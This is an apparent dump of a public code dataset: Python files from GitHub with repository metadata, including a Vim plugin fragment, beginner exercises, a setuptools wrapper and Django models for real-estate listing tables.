        value = member[valueid + 1:]
        memberlist.append((typename, value))
    return (structname, memberlist)
if __name__ == '__main__':
    #============Main Function============
    # Entry point when run from inside Vim: builds the C "show struct"
    # function and yanks it into the '*' (clipboard) register.
    #print __file__+" start!!"
    #structstr="struct Sample{int a;unsigned int b;float c;double d;char e;char* fg;short comcom};"
    # NOTE(review): sys.argv is a *list*, but GenerateShowStructFunction
    # expects a string (it calls .find on it) -- this looks like it should be
    # sys.argv[1] or a join of the args. TODO confirm how Vim invokes this.
    structstr=sys.argv
    #print structstr
    #GenerateShowStructFunction(structstr,',')
    result=GenerateShowStructFunction(structstr)
    #print result
    #Yank Code
    # `vim` is only importable when running embedded in Vim, hence the late import.
    import vim
    code=""
    for line in result:
        code+=line+"\n"
    # Store the generated code in the system clipboard register.
    vim.command(":let @*='"+code+"'")
    # NOTE: Python 2-only print statement; this plugin predates Python 3.
    print "Yank ShowStructFunction!"
|
[
"asakai.amsl+github@gmail.com"
] |
asakai.amsl+github@gmail.com
|
b1affac836aea862a8bbbcad81e417c5a613c7a1
|
50ae3a513028299e3c306d31c7dc43c8e428c335
|
/Submissions/Hebah_Qatanany/for loops.py
|
e8ad1dc623c0e5b4d7a1c9f22e9cbdc3b9841736
|
[
"Apache-2.0"
] |
permissive
|
Sinayy/Programming_with_python_2021
|
2022a7d3c906684203b8a4be79fffd662dd2becf
|
0e25caeea3888d89c832d8536ac34e0cf962e371
|
refs/heads/master
| 2022-12-18T11:40:45.142872
| 2020-09-28T14:56:53
| 2020-09-28T14:56:53
| 297,172,986
| 0
| 0
|
Apache-2.0
| 2020-09-28T19:21:00
| 2020-09-20T22:14:16
|
Python
|
UTF-8
|
Python
| false
| false
| 318
|
py
|
# Demo: drawing simple shapes by repeating a single character.
separator_line = '................................'
mark = '@'

# Shape 1: a vertical column -- the same single character on nine lines.
print(separator_line)
print('You can also create some shapes: ')
for _ in range(9):
    print(mark)

# Shape 2: a growing triangle -- each row is one character longer.
print(separator_line)
print('You can also create some shapes: ')
for width in range(1, 10):
    print(mark * width)
|
[
"70976104+hebahq@users.noreply.github.com"
] |
70976104+hebahq@users.noreply.github.com
|
acc09bc88495d5850e4a0886285923a84999db1a
|
d47ff28f502ca52e41537dc1dab54b6ca1916afc
|
/day13.py
|
8ad1be8f75826fee7ac573ad34895bb31cc1240c
|
[
"MIT"
] |
permissive
|
rho2/30DaysOfCode
|
01dc4ee42093e66e185307f7262897c04f4a6040
|
56fe3c584d0b6ae537e3ab3cfcf2387c5455dbea
|
refs/heads/master
| 2020-04-10T22:12:00.146981
| 2017-03-20T16:12:50
| 2017-03-20T16:12:50
| 65,723,691
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
from abc import ABCMeta, abstractmethod
class Book(object, metaclass=ABCMeta):
    """Abstract base class for a book with a title and an author.

    Subclasses must implement display() to render the book's details.
    """
    def __init__(self, title, author):
        self.title = title
        self.author = author
    @abstractmethod
    def display(self):
        # Bug fix: the original declared `def display():` with no `self`
        # parameter; an abstract instance method must carry the instance
        # parameter that every override receives.
        pass
#Write MyBook class
class MyBook(Book):
    """Concrete Book that adds a price and can print its own details."""
    def __init__(self, title, author, price):
        super().__init__(title, author)
        self.price = price
    def display(self):
        # Bug fix: the original printed the module-level globals `title`,
        # `author` and `price` instead of the instance attributes, so any
        # MyBook other than the one built from stdin displayed wrong data
        # (and the method failed entirely when those globals were absent).
        print('Title: ' + self.title)
        print('Author: ' + self.author)
        print('Price: ' + str(self.price))
# Read book details from stdin and display them.
title=input()
author=input()
# int(...) raises ValueError on non-numeric input; no validation is done here.
price=int(input())
new_novel=MyBook(title,author,price)
new_novel.display()
|
[
"noreply@github.com"
] |
rho2.noreply@github.com
|
2b9535cd7a594fb123bf3b4d10816b52b0158868
|
0ee0d4294f6b95a283f1aa86460a496ac903637b
|
/bin/easy_install-3.6
|
740967bc663b261b6be50597973fd28c57a96fdb
|
[] |
no_license
|
IvanChai1995/DisplayLink-switch
|
f309a5dc09e2f72b205808d4539ffe716fe49082
|
3bda99d8b192b21c1d57020703068477ee9df6ca
|
refs/heads/master
| 2021-04-18T07:16:57.548152
| 2020-03-29T16:51:03
| 2020-03-29T16:51:03
| 249,515,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
6
|
#!/mnt/c/myproject/venv/bin/python3
# -*- coding: utf-8 -*-
# Auto-generated setuptools console-script wrapper for easy_install.
# Regenerated on (re)install -- do not edit by hand.
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # Strip a trailing "-script.py(w)"/".exe" suffix from argv[0] so the
    # command reports its canonical name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"andrushin-sport@mail.ru"
] |
andrushin-sport@mail.ru
|
856aaa5c79a92a8bc4c14be5f933ebfdfff9812f
|
67d0f6bfe81bae6aa32d179de1a3a5f8e14b11d1
|
/extranet/models/student_group.py
|
b60b4d4a1f9422027a91164be1bcbb6e2c1e2fa4
|
[] |
no_license
|
jakubmisiak/wsb-programowanie-obiektowe
|
386e1d36679d2c65cdd3f344a8b9a681e34a3b19
|
5eb46b738fb5c2d72f056dd47721cc7fe7909b65
|
refs/heads/main
| 2023-03-25T20:19:45.577350
| 2020-12-16T21:22:02
| 2020-12-16T21:22:02
| 352,344,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
from django.db import models
class StudentGroup(models.Model):
    """A named group of students."""
    # Display/lookup name of the group (max 30 chars).
    name = models.CharField(max_length=30)
    def __str__(self):
        """Use the group name as the model's display string."""
        return self.name
|
[
"noreply@github.com"
] |
jakubmisiak.noreply@github.com
|
3520556196c6cd0ca5946b1f05cfde549638be00
|
6377cb6658e4f7e4fc702eca93bc308c77cb8dfd
|
/realtorModels.py
|
666247eaf866b12163ecf91f3055c72faf81912c
|
[] |
no_license
|
zhaohonggang/smalldata
|
07f0a2c6e7008f16b8244c43ed6d87ddebc090bc
|
ea981f17ab775534c03310300a1b82c65e0898e2
|
refs/heads/master
| 2021-01-20T03:22:08.717147
| 2018-03-28T13:43:33
| 2018-03-28T13:43:33
| 89,531,443
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,613
|
py
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from __future__ import unicode_literals
from django.db import models
class Article(models.Model):
    """Article row mapped onto the pre-existing `article` table (inspectdb output)."""
    article_id = models.BigAutoField(primary_key=True)
    article_name = models.CharField(max_length=20)
    article_desc = models.TextField()
    date_added = models.DateTimeField(blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'article'
class CondoSold(models.Model):
    """Sold-condo listing mapped onto the pre-existing `condo_sold` table.

    Fields mirror an MLS record: address parts, ask/sold prices and dates,
    unit attributes, and geographic coordinates. Auto-generated by inspectdb.
    """
    id = models.BigAutoField(primary_key=True)
    mlsno = models.CharField(unique=True, max_length=100, blank=True, null=True)  # MLS listing number
    status = models.CharField(max_length=100, blank=True, null=True)
    stno = models.CharField(max_length=100, blank=True, null=True)
    stname = models.CharField(max_length=100, blank=True, null=True)
    sttype = models.CharField(max_length=100, blank=True, null=True)
    aptno = models.CharField(max_length=100, blank=True, null=True)
    city = models.CharField(max_length=100, blank=True, null=True)
    area = models.CharField(max_length=100, blank=True, null=True)
    askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    inputdate = models.DateField(blank=True, null=True)
    soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    solddate = models.DateField(blank=True, null=True)
    type = models.CharField(max_length=100, blank=True, null=True)
    style = models.CharField(max_length=100, blank=True, null=True)
    bdrm = models.IntegerField(blank=True, null=True)
    wshrm = models.IntegerField(blank=True, null=True)
    maint = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    create_date = models.DateTimeField(blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'condo_sold'
class House(models.Model):
    """Scraped house listing mapped onto the pre-existing `house` table.

    Auto-generated by inspectdb; fields hold raw scraped strings (price,
    bed/bath counts, etc.) rather than typed values.
    """
    id = models.BigAutoField(primary_key=True)
    address = models.CharField(max_length=1000, blank=True, null=True)
    url = models.CharField(max_length=1000, blank=True, null=True)
    img = models.CharField(max_length=1000, blank=True, null=True)
    price_str = models.CharField(max_length=1000, blank=True, null=True)
    mls_number = models.CharField(max_length=1000, blank=True, null=True)
    bed_str = models.CharField(max_length=1000, blank=True, null=True)
    bath_str = models.CharField(max_length=1000, blank=True, null=True)
    property_type = models.CharField(max_length=1000, blank=True, null=True)
    building_type = models.CharField(max_length=1000, blank=True, null=True)
    land_size = models.CharField(max_length=1000, blank=True, null=True)
    storeys = models.CharField(max_length=1000, blank=True, null=True)
    salesperson = models.CharField(max_length=1000, blank=True, null=True)
    brokerage = models.CharField(max_length=1000, blank=True, null=True)
    # Bug fix: inspectdb emitted CharField(max_length=-1) for an unbounded
    # varchar/text column; max_length=-1 fails Django's system checks
    # (CharFields require a positive max_length). TextField is the correct
    # mapping for an unbounded text column.
    description = models.TextField(blank=True, null=True)
    create_time = models.DateTimeField(blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'house'
class HouseCategory(models.Model):
    """Category lookup with English/Chinese labels (`house_category` table)."""
    id = models.BigAutoField(primary_key=True)
    name = models.CharField(max_length=100, blank=True, null=True)
    en = models.CharField(max_length=500, blank=True, null=True)  # English label
    cn = models.CharField(max_length=500, blank=True, null=True)  # Chinese label
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'house_category'
class HouseForSale(models.Model):
    """Active house listing (`house_for_sale` table); same columns as HouseSold.

    Auto-generated by inspectdb; note the id is a plain BigIntegerField here
    (not auto-incrementing), unlike CondoSold.
    """
    id = models.BigIntegerField(primary_key=True)
    mlsno = models.CharField(unique=True, max_length=100, blank=True, null=True)  # MLS listing number
    status = models.CharField(max_length=100, blank=True, null=True)
    stno = models.CharField(max_length=100, blank=True, null=True)
    stname = models.CharField(max_length=100, blank=True, null=True)
    sttype = models.CharField(max_length=100, blank=True, null=True)
    aptno = models.CharField(max_length=100, blank=True, null=True)
    city = models.CharField(max_length=100, blank=True, null=True)
    area = models.CharField(max_length=100, blank=True, null=True)
    askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    inputdate = models.DateField(blank=True, null=True)
    soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    solddate = models.DateField(blank=True, null=True)
    type = models.CharField(max_length=100, blank=True, null=True)
    style = models.CharField(max_length=100, blank=True, null=True)
    bdrm = models.IntegerField(blank=True, null=True)
    wshrm = models.IntegerField(blank=True, null=True)
    maint = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    create_date = models.DateTimeField(blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'house_for_sale'
class HouseSold(models.Model):
    """Sold house listing (`house_sold` table); same columns as HouseForSale."""
    id = models.BigIntegerField(primary_key=True)
    mlsno = models.CharField(unique=True, max_length=100, blank=True, null=True)  # MLS listing number
    status = models.CharField(max_length=100, blank=True, null=True)
    stno = models.CharField(max_length=100, blank=True, null=True)
    stname = models.CharField(max_length=100, blank=True, null=True)
    sttype = models.CharField(max_length=100, blank=True, null=True)
    aptno = models.CharField(max_length=100, blank=True, null=True)
    city = models.CharField(max_length=100, blank=True, null=True)
    area = models.CharField(max_length=100, blank=True, null=True)
    askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    inputdate = models.DateField(blank=True, null=True)
    soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    solddate = models.DateField(blank=True, null=True)
    type = models.CharField(max_length=100, blank=True, null=True)
    style = models.CharField(max_length=100, blank=True, null=True)
    bdrm = models.IntegerField(blank=True, null=True)
    wshrm = models.IntegerField(blank=True, null=True)
    maint = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    create_date = models.DateTimeField(blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'house_sold'
class HouseSoldBak(models.Model):
    """Backup copy of sold houses (`house_sold_bak` table).

    Unlike HouseSold: no declared primary key (id is nullable and non-unique),
    no aptno/maint columns, and mlsno is not unique.
    """
    id = models.BigIntegerField(blank=True, null=True)
    mlsno = models.CharField(max_length=100, blank=True, null=True)
    status = models.CharField(max_length=100, blank=True, null=True)
    stno = models.CharField(max_length=100, blank=True, null=True)
    stname = models.CharField(max_length=100, blank=True, null=True)
    sttype = models.CharField(max_length=100, blank=True, null=True)
    city = models.CharField(max_length=100, blank=True, null=True)
    area = models.CharField(max_length=100, blank=True, null=True)
    askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    inputdate = models.DateField(blank=True, null=True)
    soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
    solddate = models.DateField(blank=True, null=True)
    type = models.CharField(max_length=100, blank=True, null=True)
    style = models.CharField(max_length=100, blank=True, null=True)
    bdrm = models.IntegerField(blank=True, null=True)
    wshrm = models.IntegerField(blank=True, null=True)
    latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
    create_date = models.DateTimeField(blank=True, null=True)
    class Meta:
        managed = False  # table is created/maintained outside Django migrations
        db_table = 'house_sold_bak'
|
[
"zhaohonggang@yahoo.com"
] |
zhaohonggang@yahoo.com
|
8a61dfaf9fdc2a7c8a75310bc6c02de1f7d6da31
|
2099a076de21d5d08e07d1675fad1184ee46c2fb
|
/archstart/hello.py
|
8e5a11a909cc10695d6e2bb56e4dee75e1e944fe
|
[
"MIT"
] |
permissive
|
jacobjhansen/archstart
|
6db98cd715ad934f13426882a663707202d197c2
|
959301b71dbbe534c736e133dcd60199494819af
|
refs/heads/master
| 2023-04-12T15:13:27.980744
| 2021-04-30T14:46:53
| 2021-04-30T14:46:53
| 345,779,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
import getpass
def say_hello():
    """Print a friendly greeting addressed to the current OS user."""
    current_user = getpass.getuser()
    greeting = "Hello, {} =)".format(current_user)
    print(greeting)
|
[
"jjhansen1999@gmail.com"
] |
jjhansen1999@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.